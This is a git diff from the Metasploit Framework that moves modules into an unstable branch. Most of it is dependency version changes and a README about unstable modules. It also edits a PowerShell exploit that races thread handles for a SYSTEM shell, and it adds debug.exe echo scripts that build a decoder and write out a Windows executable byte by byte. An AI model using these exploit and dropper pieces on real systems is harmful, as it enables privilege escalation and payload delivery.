Remove scrollout_loadlogs_exec for @bcoles

Move #6900 into unstable
Fix unstable branch
2017-04-21 21:24:06 -05:00 · 2016-07-20 15:17:32 -05:00 · 2016-07-20 15:12:45 -05:00 · 2016-07-20 13:10:17 -05:00 · 2016-05-25 19:32:55 -05:00 · 2016-05-25 04:07:09 -05:00
1248 changed files with 68803 additions and 27912 deletions
@@ -1 +1 @@
-2.3.2
+2.3.1
@@ -10,7 +10,7 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.2'
+  - '2.3.1'

 env:
  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
@@ -46,7 +46,6 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -109,7 +108,6 @@ already way ahead of the curve, so keep it up!
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.13.1)
+    metasploit-framework (4.12.15)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -14,17 +14,15 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.2.1)
+      metasploit-payloads (= 1.1.13)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.2)
+      metasploit_payloads-mettle
      msgpack
-      nessus_rest
      net-ssh
      network_interface
      nokogiri
      octokit
      openssl-ccm
-      openvas-omp
      packetfu
      patch_finder
      pcaprub
@@ -33,68 +31,54 @@ PATH
      rb-readline-r7
      recog
      redcarpet
-      rex-arch (= 0.1.2)
-      rex-bin_tools
-      rex-core
-      rex-encoder
-      rex-exploitation
      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
      rex-powershell
      rex-random_identifier
      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
      robots
-      rubyntlm
      rubyzip
      sqlite3
      sshkey
      tzinfo
      tzinfo-data
-      windows_error

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.7.1)
-      actionview (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    activemodel (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
-    activerecord (4.2.7.1)
-      activemodel (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
      arel (~> 6.0)
-    activesupport (4.2.7.1)
+    activesupport (4.2.7)
      i18n (~> 0.7)
      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.0)
-      public_suffix (~> 2.0, >= 2.0.2)
+    addressable (2.4.0)
    arel (6.0.3)
    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
+    aruba (0.14.1)
      childprocess (~> 0.5.6)
      contracts (~> 0.9)
      cucumber (>= 1.3.19)
@@ -104,7 +88,7 @@ GEM
    bcrypt (3.1.11)
    bit-struct (0.15.0)
    builder (3.2.2)
-    capybara (2.10.1)
+    capybara (2.7.1)
      addressable
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
@@ -125,12 +109,12 @@ GEM
      multi_test (>= 0.1.2)
    cucumber-core (1.5.0)
      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
+    cucumber-rails (1.4.3)
      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
+      cucumber (>= 1.3.8, < 3)
      mime-types (>= 1.16, < 4)
      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
+      railties (>= 3, < 5)
    cucumber-wire (0.0.1)
    diff-lcs (1.2.5)
    docile (1.1.5)
@@ -153,11 +137,11 @@ GEM
    loofah (2.0.3)
      nokogiri (>= 1.5.9)
    metasm (1.0.2)
-    metasploit-concern (2.0.2)
+    metasploit-concern (2.0.1)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.7)
+    metasploit-credential (2.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models
@@ -165,12 +149,12 @@ GEM
      railties
      rubyntlm
      rubyzip
-    metasploit-model (2.0.2)
+    metasploit-model (2.0.0)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.2.1)
-    metasploit_data_models (2.0.8)
+    metasploit-payloads (1.1.13)
+    metasploit_data_models (2.0.0)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -180,33 +164,33 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.2)
+    metasploit_payloads-mettle (0.0.5)
    method_source (0.8.2)
    mime-types (3.1)
      mime-types-data (~> 3.2015)
    mime-types-data (3.2016.0521)
    mini_portile2 (2.1.0)
-    minitest (5.9.1)
-    msgpack (1.0.2)
+    minitest (5.9.0)
+    msgpack (1.0.0)
    multi_json (1.12.1)
    multi_test (0.1.2)
    multipart-post (2.0.0)
-    nessus_rest (0.1.6)
    net-ssh (3.2.0)
    network_interface (0.0.1)
-    nokogiri (1.6.8.1)
+    nokogiri (1.6.8)
      mini_portile2 (~> 2.1.0)
-    octokit (4.6.1)
-      sawyer (~> 0.8.0, >= 0.5.3)
+      pkg-config (~> 1.1.7)
+    octokit (4.3.0)
+      sawyer (~> 0.7.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    openvas-omp (0.0.4)
    packetfu (1.1.11)
      network_interface (~> 0.0)
      pcaprub (~> 0.12)
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pg (0.19.0)
+    pg (0.18.4)
    pg_array_parser (0.0.9)
+    pkg-config (1.1.7)
    postgres_ext (3.0.0)
      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
@@ -215,8 +199,7 @@ GEM
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    public_suffix (2.0.4)
-    rack (1.6.5)
+    rack (1.6.4)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
@@ -227,64 +210,30 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.7.1)
-      actionpack (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (11.3.0)
+    rake (11.2.2)
    rb-readline-r7 (0.5.2.0)
-    recog (2.0.24)
+    recog (2.0.21)
      nokogiri
    redcarpet (3.3.4)
-    rex-arch (0.1.2)
-      rex-text
-    rex-bin_tools (0.1.1)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.2)
-    rex-encoder (0.1.0)
-      metasm
-      rex-arch
-      rex-text
-    rex-exploitation (0.1.2)
-      jsobfu
-      metasm
-      rex-arch
-      rex-encoder
-      rex-text
    rex-java (0.1.2)
-    rex-mime (0.1.1)
-      rex-text
-    rex-nop (0.1.0)
-      rex-arch
-    rex-ole (0.1.2)
-      rex-text
-    rex-powershell (0.1.66)
+    rex-powershell (0.1.0)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.0)
      rex-text
    rex-registry (0.1.0)
-    rex-rop_builder (0.1.0)
-      metasm
-      rex-core
-      rex-text
-    rex-socket (0.1.1)
-      rex-core
-    rex-sslscan (0.1.0)
-      rex-socket
-      rex-text
    rex-struct2 (0.1.0)
-    rex-text (0.2.5)
+    rex-text (0.1.1)
    rex-zip (0.1.0)
      rex-text
    rkelly-remix (0.0.6)
    robots (0.10.1)
-    rspec-core (3.5.4)
+    rspec-core (3.5.1)
      rspec-support (~> 3.5.0)
    rspec-expectations (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -292,7 +241,7 @@ GEM
    rspec-mocks (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+    rspec-rails (3.5.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -301,10 +250,10 @@ GEM
      rspec-mocks (~> 3.5.0)
      rspec-support (~> 3.5.0)
    rspec-support (3.5.0)
-    rubyntlm (0.6.1)
+    rubyntlm (0.6.0)
    rubyzip (1.2.0)
-    sawyer (0.8.0)
-      addressable (>= 2.3.5, < 2.6)
+    sawyer (0.7.0)
+      addressable (>= 2.3.5, < 2.5)
      faraday (~> 0.8, < 0.10)
    shoulda-matchers (3.1.1)
      activesupport (>= 4.0.0)
@@ -314,19 +263,18 @@ GEM
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.0)
    slop (3.6.0)
-    sqlite3 (1.3.12)
+    sqlite3 (1.3.11)
    sshkey (1.8.0)
    thor (0.19.1)
    thread_safe (0.3.5)
    timecop (0.8.1)
    tzinfo (1.2.2)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.9)
+    tzinfo-data (1.2016.6)
      tzinfo (>= 1.0.0)
-    windows_error (0.0.2)
    xpath (2.0.0)
      nokogiri (~> 1.3)
-    yard (0.9.5)
+    yard (0.9.0)

 PLATFORMS
  ruby
@@ -348,4 +296,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.13.6
+   1.12.5
@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
    $TidArray = @()

    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
        $hThread = Get-ThreadHandle
        $hThreadID = [Kernel32]::GetThreadId($hThread)
        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,19 +309,6 @@ Add-Type -TypeDefinition @"
            0x00000002, $cmd, $args1,
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
        $hTokenHandle = [IntPtr]::Zero
        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

@@ -344,4 +331,4 @@ Add-Type -TypeDefinition @"
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
-    exit
+    exit
@@ -0,0 +1,91 @@
+echo a 0100 >>decoder_stub
+echo jmp 197 >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov ax,4c00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov ah,3d >>decoder_stub
+echo mov al,00 >>decoder_stub
+echo mov dx,1bf >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1bd],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,3c >>decoder_stub
+echo mov cx,2 >>decoder_stub
+echo mov dx,1ce >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1cc],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ax,3e00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo mov ax,3f00 >>decoder_stub
+echo mov cx,100 >>decoder_stub
+echo mov dx,0200 >>decoder_stub
+echo int 21 >>decoder_stub
+echo cmp ax,2 >>decoder_stub
+echo ja 151 >>decoder_stub
+echo call 178 >>decoder_stub
+echo call 103 >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,0 >>decoder_stub
+echo or al,20 >>decoder_stub
+echo sub al,30 >>decoder_stub
+echo cmp al,9 >>decoder_stub
+echo jbe 164 >>decoder_stub
+echo sub al,31 >>decoder_stub
+echo cmp al,5 >>decoder_stub
+echo ja 165 >>decoder_stub
+echo add al,a >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,ff >>decoder_stub
+echo ret >>decoder_stub
+echo cmp bp,0 >>decoder_stub
+echo jne 175 >>decoder_stub
+echo call 137 >>decoder_stub
+echo mov bp,ax >>decoder_stub
+echo mov si,200 >>decoder_stub
+echo lodsb >>decoder_stub
+echo dec bp >>decoder_stub
+echo ret >>decoder_stub
+echo mov cx,di >>decoder_stub
+echo sub cx,300 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo mov ax,4000 >>decoder_stub
+echo mov dx,0300 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo call 168 >>decoder_stub
+echo call 152 >>decoder_stub
+echo cmp ah,0 >>decoder_stub
+echo jne 18b >>decoder_stub
+echo ret >>decoder_stub
+echo call 116 >>decoder_stub
+echo call 123 >>decoder_stub
+echo mov bp,0 >>decoder_stub
+echo mov di,300 >>decoder_stub
+echo call 18b >>decoder_stub
+echo mov cx,1000 >>decoder_stub
+echo mul cx >>decoder_stub
+echo push ax >>decoder_stub
+echo call 18b >>decoder_stub
+echo pop dx >>decoder_stub
+echo or al,dh >>decoder_stub
+echo stosb >>decoder_stub
+echo cmp bp, 0 >>decoder_stub
+echo jne 1a3 >>decoder_stub
+echo call 178 >>decoder_stub
+echo jmp 1a0 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.dat",00 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.out",00 >>decoder_stub
+echo  >>decoder_stub
+echo r cx >>decoder_stub
+echo 0400 >>decoder_stub
+echo n h2b.com >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
@@ -0,0 +1,819 @@
+echo n decoder_stub.bin > decoder_stub
+echo r cx >>decoder_stub
+echo 1400 >>decoder_stub
+echo f 0100 ffff 00 >>decoder_stub
+echo e 100 4d 5a 90 >>decoder_stub
+echo e 104 03 >>decoder_stub
+echo e 108 04 >>decoder_stub
+echo e 10c ff ff >>decoder_stub
+echo e 110 b8 >>decoder_stub
+echo e 118 40 >>decoder_stub
+echo e 13c 80 >>decoder_stub
+echo e 140 0e 1f ba 0e >>decoder_stub
+echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
+echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
+echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
+echo e 180 50 45 >>decoder_stub
+echo e 184 4c 01 03 >>decoder_stub
+echo e 188 85 18 7c 48 >>decoder_stub
+echo e 194 e0 >>decoder_stub
+echo e 196 0e 01 0b 01 08 >>decoder_stub
+echo e 19d 0a >>decoder_stub
+echo e 1a1 08 >>decoder_stub
+echo e 1a8 be 28 >>decoder_stub
+echo e 1ad 20 >>decoder_stub
+echo e 1b1 40 >>decoder_stub
+echo e 1b6 40 >>decoder_stub
+echo e 1b9 20 >>decoder_stub
+echo e 1bd 02 >>decoder_stub
+echo e 1c0 04 >>decoder_stub
+echo e 1c8 04 >>decoder_stub
+echo e 1d1 80 >>decoder_stub
+echo e 1d5 02 >>decoder_stub
+echo e 1dc 03 >>decoder_stub
+echo e 1de 40 05 >>decoder_stub
+echo e 1e2 10 >>decoder_stub
+echo e 1e5 10 >>decoder_stub
+echo e 1ea 10 >>decoder_stub
+echo e 1ed 10 >>decoder_stub
+echo e 1f4 10 >>decoder_stub
+echo e 200 6c 28 >>decoder_stub
+echo e 204 4f >>decoder_stub
+echo e 209 40 >>decoder_stub
+echo e 20c 30 05 >>decoder_stub
+echo e 221 60 >>decoder_stub
+echo e 224 0c >>decoder_stub
+echo e 228 fc 27 >>decoder_stub
+echo e 22c 1c >>decoder_stub
+echo e 259 20 >>decoder_stub
+echo e 25c 08 >>decoder_stub
+echo e 268 08 20 >>decoder_stub
+echo e 26c 48 >>decoder_stub
+echo e 278 2e 74 65 78 74 >>decoder_stub
+echo e 280 c4 08 >>decoder_stub
+echo e 285 20 >>decoder_stub
+echo e 289 0a >>decoder_stub
+echo e 28d 02 >>decoder_stub
+echo e 29c 20 >>decoder_stub
+echo e 29f 60 2e 72 73 72 63 >>decoder_stub
+echo e 2a8 30 05 >>decoder_stub
+echo e 2ad 40 >>decoder_stub
+echo e 2b1 06 >>decoder_stub
+echo e 2b5 0c >>decoder_stub
+echo e 2c4 40 >>decoder_stub
+echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
+echo e 2d0 0c >>decoder_stub
+echo e 2d5 60 >>decoder_stub
+echo e 2d9 02 >>decoder_stub
+echo e 2dd 12 >>decoder_stub
+echo e 2ec 40 >>decoder_stub
+echo e 2ef 42 >>decoder_stub
+echo e 300 a0 28 >>decoder_stub
+echo e 308 48 >>decoder_stub
+echo e 30c 02 >>decoder_stub
+echo e 30e 05 >>decoder_stub
+echo e 310 24 21 >>decoder_stub
+echo e 314 d8 06 >>decoder_stub
+echo e 318 01 >>decoder_stub
+echo e 31c 01 >>decoder_stub
+echo e 31f 06 >>decoder_stub
+echo e 350 13 30 04 >>decoder_stub
+echo e 354 be >>decoder_stub
+echo e 358 01 >>decoder_stub
+echo e 35b 11 >>decoder_stub
+echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
+echo e 36a 72 01 >>decoder_stub
+echo e 36e 70 28 10 >>decoder_stub
+echo e 373 0a >>decoder_stub
+echo e 376 38 9e >>decoder_stub
+echo e 37c 02 16 9a 28 11 >>decoder_stub
+echo e 383 0a 72 4b >>decoder_stub
+echo e 388 70 72 4f >>decoder_stub
+echo e 38d 70 6f 12 >>decoder_stub
+echo e 392 0a 72 51 >>decoder_stub
+echo e 397 70 72 4f >>decoder_stub
+echo e 39c 70 6f 12 >>decoder_stub
+echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
+echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
+echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
+echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
+echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
+echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
+echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
+echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
+echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
+echo e 3f6 70 28 16 >>decoder_stub
+echo e 3fb 0a 28 17 >>decoder_stub
+echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
+echo e 40e 0a >>decoder_stub
+echo e 410 11 05 6f 19 >>decoder_stub
+echo e 416 0a >>decoder_stub
+echo e 419 2a 1e 02 28 1a >>decoder_stub
+echo e 420 0a 2a >>decoder_stub
+echo e 424 42 53 4a 42 01 >>decoder_stub
+echo e 42a 01 >>decoder_stub
+echo e 430 0c >>decoder_stub
+echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
+echo e 442 05 >>decoder_stub
+echo e 444 6c >>decoder_stub
+echo e 448 30 02 >>decoder_stub
+echo e 44c 23 7e >>decoder_stub
+echo e 450 9c 02 >>decoder_stub
+echo e 454 d0 02 >>decoder_stub
+echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
+echo e 464 6c 05 >>decoder_stub
+echo e 468 60 >>decoder_stub
+echo e 46c 23 55 53 >>decoder_stub
+echo e 470 cc 05 >>decoder_stub
+echo e 474 10 >>decoder_stub
+echo e 478 23 47 55 49 44 >>decoder_stub
+echo e 480 dc 05 >>decoder_stub
+echo e 484 fc >>decoder_stub
+echo e 488 23 42 6c 6f 62 >>decoder_stub
+echo e 494 02 >>decoder_stub
+echo e 497 01 47 15 02 >>decoder_stub
+echo e 49c 09 >>decoder_stub
+echo e 4a1 fa 01 33 >>decoder_stub
+echo e 4a5 16 >>decoder_stub
+echo e 4a8 01 >>decoder_stub
+echo e 4ac 18 >>decoder_stub
+echo e 4b0 02 >>decoder_stub
+echo e 4b4 02 >>decoder_stub
+echo e 4b8 01 >>decoder_stub
+echo e 4bc 1a >>decoder_stub
+echo e 4c0 0d >>decoder_stub
+echo e 4c4 01 >>decoder_stub
+echo e 4c8 01 >>decoder_stub
+echo e 4cc 01 >>decoder_stub
+echo e 4d2 0a >>decoder_stub
+echo e 4d4 01 >>decoder_stub
+echo e 4da 06 >>decoder_stub
+echo e 4dc 36 >>decoder_stub
+echo e 4de 2f >>decoder_stub
+echo e 4e0 06 >>decoder_stub
+echo e 4e2 5f >>decoder_stub
+echo e 4e4 4d >>decoder_stub
+echo e 4e6 06 >>decoder_stub
+echo e 4e8 76 >>decoder_stub
+echo e 4ea 4d >>decoder_stub
+echo e 4ec 06 >>decoder_stub
+echo e 4ee 93 >>decoder_stub
+echo e 4f0 4d >>decoder_stub
+echo e 4f2 06 >>decoder_stub
+echo e 4f4 b2 >>decoder_stub
+echo e 4f6 4d >>decoder_stub
+echo e 4f8 06 >>decoder_stub
+echo e 4fa cb >>decoder_stub
+echo e 4fc 4d >>decoder_stub
+echo e 4fe 06 >>decoder_stub
+echo e 500 e4 >>decoder_stub
+echo e 502 4d >>decoder_stub
+echo e 504 06 >>decoder_stub
+echo e 506 ff >>decoder_stub
+echo e 508 4d >>decoder_stub
+echo e 50a 06 >>decoder_stub
+echo e 50c 1a 01 4d >>decoder_stub
+echo e 510 06 >>decoder_stub
+echo e 512 52 01 33 01 06 >>decoder_stub
+echo e 518 66 01 33 01 06 >>decoder_stub
+echo e 51e 74 01 4d >>decoder_stub
+echo e 522 06 >>decoder_stub
+echo e 524 8d 01 4d >>decoder_stub
+echo e 528 06 >>decoder_stub
+echo e 52a bd 01 aa 01 3b >>decoder_stub
+echo e 530 d1 01 >>decoder_stub
+echo e 534 06 >>decoder_stub
+echo e 537 02 e0 01 06 >>decoder_stub
+echo e 53c 20 02 e0 01 06 >>decoder_stub
+echo e 542 3e 02 2f >>decoder_stub
+echo e 546 06 >>decoder_stub
+echo e 548 5a 02 50 02 06 >>decoder_stub
+echo e 54e 6b 02 2f >>decoder_stub
+echo e 552 06 >>decoder_stub
+echo e 554 85 02 2f >>decoder_stub
+echo e 558 06 >>decoder_stub
+echo e 55a 94 02 2f >>decoder_stub
+echo e 55e 06 >>decoder_stub
+echo e 560 aa 02 50 02 06 >>decoder_stub
+echo e 566 bc 02 50 02 >>decoder_stub
+echo e 56e 01 >>decoder_stub
+echo e 574 01 >>decoder_stub
+echo e 576 01 >>decoder_stub
+echo e 57a 10 >>decoder_stub
+echo e 57c 16 >>decoder_stub
+echo e 57e 1e >>decoder_stub
+echo e 580 05 >>decoder_stub
+echo e 582 01 >>decoder_stub
+echo e 584 01 >>decoder_stub
+echo e 586 50 20 >>decoder_stub
+echo e 58c 91 >>decoder_stub
+echo e 58e 3d >>decoder_stub
+echo e 590 0a >>decoder_stub
+echo e 592 01 >>decoder_stub
+echo e 594 1a 21 >>decoder_stub
+echo e 59a 86 18 42 >>decoder_stub
+echo e 59e 10 >>decoder_stub
+echo e 5a0 02 >>decoder_stub
+echo e 5a4 01 >>decoder_stub
+echo e 5a6 48 >>decoder_stub
+echo e 5a8 11 >>decoder_stub
+echo e 5aa 42 >>decoder_stub
+echo e 5ac 14 >>decoder_stub
+echo e 5ae 19 >>decoder_stub
+echo e 5b0 42 >>decoder_stub
+echo e 5b2 14 >>decoder_stub
+echo e 5b4 21 >>decoder_stub
+echo e 5b6 42 >>decoder_stub
+echo e 5b8 14 >>decoder_stub
+echo e 5ba 29 >>decoder_stub
+echo e 5bc 42 >>decoder_stub
+echo e 5be 14 >>decoder_stub
+echo e 5c0 31 >>decoder_stub
+echo e 5c2 42 >>decoder_stub
+echo e 5c4 14 >>decoder_stub
+echo e 5c6 39 >>decoder_stub
+echo e 5c8 42 >>decoder_stub
+echo e 5ca 14 >>decoder_stub
+echo e 5cc 41 >>decoder_stub
+echo e 5ce 42 >>decoder_stub
+echo e 5d0 14 >>decoder_stub
+echo e 5d2 49 >>decoder_stub
+echo e 5d4 42 >>decoder_stub
+echo e 5d6 14 >>decoder_stub
+echo e 5d8 51 >>decoder_stub
+echo e 5da 42 >>decoder_stub
+echo e 5dc 19 >>decoder_stub
+echo e 5de 59 >>decoder_stub
+echo e 5e0 42 >>decoder_stub
+echo e 5e2 14 >>decoder_stub
+echo e 5e4 61 >>decoder_stub
+echo e 5e6 42 >>decoder_stub
+echo e 5e8 14 >>decoder_stub
+echo e 5ea 69 >>decoder_stub
+echo e 5ec 42 >>decoder_stub
+echo e 5ee 14 >>decoder_stub
+echo e 5f0 71 >>decoder_stub
+echo e 5f2 42 >>decoder_stub
+echo e 5f4 1e >>decoder_stub
+echo e 5f6 81 >>decoder_stub
+echo e 5f8 42 >>decoder_stub
+echo e 5fa 24 >>decoder_stub
+echo e 5fc 89 >>decoder_stub
+echo e 5fe 42 >>decoder_stub
+echo e 600 10 >>decoder_stub
+echo e 602 91 >>decoder_stub
+echo e 604 46 02 29 >>decoder_stub
+echo e 608 99 >>decoder_stub
+echo e 60a 5f 02 2e >>decoder_stub
+echo e 60e a1 >>decoder_stub
+echo e 610 72 02 33 >>decoder_stub
+echo e 614 a1 >>decoder_stub
+echo e 616 7a 02 39 >>decoder_stub
+echo e 61a a1 >>decoder_stub
+echo e 61c 8a 02 3d >>decoder_stub
+echo e 620 b1 >>decoder_stub
+echo e 622 9c 02 43 >>decoder_stub
+echo e 626 a1 >>decoder_stub
+echo e 628 a3 02 49 >>decoder_stub
+echo e 62c 99 >>decoder_stub
+echo e 62e b5 02 4f >>decoder_stub
+echo e 632 c1 >>decoder_stub
+echo e 634 c3 02 55 >>decoder_stub
+echo e 638 c1 >>decoder_stub
+echo e 63a c9 02 10 >>decoder_stub
+echo e 63e 09 >>decoder_stub
+echo e 640 42 >>decoder_stub
+echo e 642 10 >>decoder_stub
+echo e 644 2e >>decoder_stub
+echo e 646 0b >>decoder_stub
+echo e 648 69 >>decoder_stub
+echo e 64a 2e >>decoder_stub
+echo e 64c 13 >>decoder_stub
+echo e 64e 76 >>decoder_stub
+echo e 650 2e >>decoder_stub
+echo e 652 1b >>decoder_stub
+echo e 654 76 >>decoder_stub
+echo e 656 2e >>decoder_stub
+echo e 658 23 >>decoder_stub
+echo e 65a 76 >>decoder_stub
+echo e 65c 2e >>decoder_stub
+echo e 65e 2b >>decoder_stub
+echo e 660 69 >>decoder_stub
+echo e 662 2e >>decoder_stub
+echo e 664 33 >>decoder_stub
+echo e 666 7c >>decoder_stub
+echo e 668 2e >>decoder_stub
+echo e 66a 3b >>decoder_stub
+echo e 66c 76 >>decoder_stub
+echo e 66e 2e >>decoder_stub
